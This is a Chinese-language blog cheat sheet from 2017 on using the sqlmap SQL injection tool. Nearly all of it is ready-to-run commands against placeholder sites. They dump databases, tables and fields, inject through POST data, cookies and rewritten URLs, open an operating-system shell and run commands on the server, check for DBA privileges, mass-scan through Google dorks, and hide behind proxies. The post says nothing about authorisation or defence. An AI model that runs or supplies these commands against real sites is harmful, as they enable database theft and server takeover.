sqlmap的使用姿势

发表于:2017-10-14

安装sqlmap

sqlmap是用python写的,所以先安装python,这里不介绍python安装方法自行百度。

sqlmap下载地址 下载之后解压就好了。

普通注入, -u 是URL地址,他会自动找到第一个参数 id

sqlmap.py -u "http://www.domain.com/news_info.asp?id=244"

获取数据库

sqlmap.py -u "http://www.domain.com/news_info.asp?id=244" --dbs

获取表

sqlmap.py -u "http://www.domain.com/news_info.asp?id=244" -D “数据库” --tables

获取表里的字段

sqlmap.py -u "http://www.domain.com/news_info.asp?id=244" -D “数据库” -T "表" --columns

获取字段里的信息, 多个字段用逗号分隔

sqlmap.py -u "http://www.domain.com/news_info.asp?id=244" -D “数据库” -T "表" -C "字段,字段" --dump

POST注入的两种方法

第一种,--data 是发送body里的字段 -p 是要注入的参数

sqlmap.py -u "http://www.domain.com/news_info.asp" --data="id=244" -p "id"

第二种,抓包后保存成txt文件, -r 指定你的文本

sqlmap.py -r sqlmap.txt -p "username"

自动搜索注入, 会找到当前页面的表单进行注入

sqlmap.py -u "http://www.domain.com/news_info.asp" --forms
sqlmap.py -u "http://www.domain.com/news_info.asp" --cookie "ID=1490" --level 2

伪静态注入, 伪静态指定是没有查询参数,只要在注入点里加*

sqlmap.py -u "http://www.domain.cn/index.php/Article/index/id/1161*"

交互写shell及命令执行,需要有足够大的权限, 前提知道网站路径

会让你选择网站语言,php还是asp等,然后输入你的网站根目录

sqlmap.py -u "http://www.domain.cn/index.php/Article/index/id/1161" --os-shell

执行命令

sqlmap.py -u "http://www.domain.cn/index.php/Article/index/id/1161" --os-cmd=ipconfig

延时注入, --delay 后面是1秒, --safe-freq 测试频率,可以不要

sqlmap.py -u "http://www.domain.cn/index.php/Article/index/id/1161" --delay 1 --safe-freq 3

谷歌搜索批量检测注入(很少用到,因为能注入的几率很小)

sqlmap.py -g inurl:php?id=

查看权限

sqlmap.py -u "http://www.domain.com.cn/news_info.asp?id=244" --privileges

当前用户

sqlmap.py -u "http://www.domain.com.cn/news_info.asp?id=244" --current-user

是否dba权限,这个权限很大,有了他无所不能

sqlmap.py -u "http://www.domain.com.cn/news_info.asp?id=244" --is-dba

当前数据库名

sqlmap.py -u "http://www.domain.com.cn/news_info.asp?id=244" --current-db

获取banner信息

sqlmap.py -u "http://www.domain.com.cn/news_info.asp?id=244" -b

自动化测试注入, 他会帮你自动 y/n

sqlmap.py -u "http://www.domain.com.cn" --batch

爬行网站URL,后面跟的参数是爬行的深度--crawl 是爬取深度

sqlmap.py -u "http://www.domain.com.cn" --batch --crawl=3

代理注入,很多时候会挂掉--proxy 代理地址

sqlmap.py -u "http://www.domain.com.cn/news_info.asp?id=244" --proxy="http://代理IP:端口"

使用文件去代理

sqlmap.py -u "http://www.domain.com.cn/news_info.asp?id=244" --proxy-file="代理IP文件路径"
WEB安全